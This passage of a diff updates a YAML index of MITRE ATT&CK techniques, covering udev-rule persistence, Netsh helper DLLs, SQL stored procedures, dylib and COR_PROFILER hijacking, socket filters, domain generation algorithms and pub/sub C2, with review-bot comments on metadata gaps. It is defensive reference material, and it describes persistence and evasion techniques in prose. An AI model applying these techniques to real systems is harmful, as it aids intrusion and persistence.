Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35981,6 +36359,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -36017,17 +36396,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -36073,9 +36452,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
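Review bot: in the new T1546.017 object, `x_mitre_detection` writes `/usr/lib/udev/rules.d/` without the backticks used for the other two paths and ends with a trailing space inside the quoted scalar (`2024) '`); more importantly it names only three rule directories while the description lists five, omitting `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`, so a file monitor built from the detection text alone would miss rules dropped there. The object also has no `identifier: T1546.017` line, unlike neighbouring entries such as T1546.007; if the index relies on that key for lookups, add it. The detection text may be mirrored verbatim from upstream, in which case that fix belongs there, but the missing `identifier` is local to this file.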
@@ -36112,7 +36547,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36136,51 +36571,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36203,20 +36598,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
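Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root) is dropped from T1505.001 with no equivalent field added, while other objects in this diff keep theirs (T1556.004, T1574.012). The removal is expected if the source object no longer carries the property, but the inconsistency between objects again suggests the file mixes objects from different bundle versions, so confirm they all come from the same release. The NetSPI references moving to the `www.netspi.com/blog/technical-blog/...` paths with refreshed retrieval dates is fine.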
T1556.004:
technique:
@@ -36246,7 +36678,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36270,12 +36702,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36359,11 +36789,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36415,9 +36844,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36466,7 +36894,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36504,14 +36932,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36574,7 +37000,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36632,97 +37057,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
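Review bot: the Akamai DGA Mitigation reference in the T1568.002 entry changes its URL from `https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html` to `https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e` while its description still attributes the piece to Liu and Yuzifovich under the Akamai source name; confirm this came from the upstream ATT&CK STIX data rather than a manual edit. The same hunk drops `x_mitre_permissions_required: - User` from T1568.002, but the context lines for the parent T1568 (and for T1205.001 and T1102.003 further down) still carry that key, so the index will be inconsistent about the field unless those entries are regenerated as well.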
@@ -36788,9 +37211,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
